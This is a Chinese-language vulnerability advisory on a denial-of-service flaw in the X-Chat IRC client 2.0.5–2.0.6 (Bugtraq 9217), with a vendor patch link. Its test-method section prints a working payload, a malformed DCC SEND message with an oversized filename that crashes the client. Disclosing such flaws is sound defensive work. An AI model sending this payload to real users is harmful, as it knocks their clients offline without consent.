发布日期：2003-12-15
更新日期：2003-12-23

受影响系统：

X-Chat X-Chat 2.0.6
X-Chat X-Chat 2.0.5

描述：

---

BUGTRAQ  ID: 9217

X-chat是一款免费开放源代码的IRC客户端，可运行在Unix、Linux和Microsoft Windows平台下。

X-chat不正确处理恶意'DDC SEND'请求，远程攻击者可以利用这个漏洞对客户端进行拒绝服务攻击。

攻击者可以发送恶意'DDC SEND'请求，可允许攻击者使IRC客户端崩溃。Linux平台上的X-chat 2.0.5和2.0.6版本存在此问题，不过其他平台下的此版本可能也存在这个问题。

<*来源：Stefan Hecker （s.hecker@stud.uni-goettingen.de）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=107152093419276&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

quote PRIVMSG #mirc :^ADCC SEND "a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
a a" 1363975063 3500 4^A

建议：

---

厂商补丁：

X-Chat
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.xchat.org/

浏览次数：2708
严重程度：0（网友投票）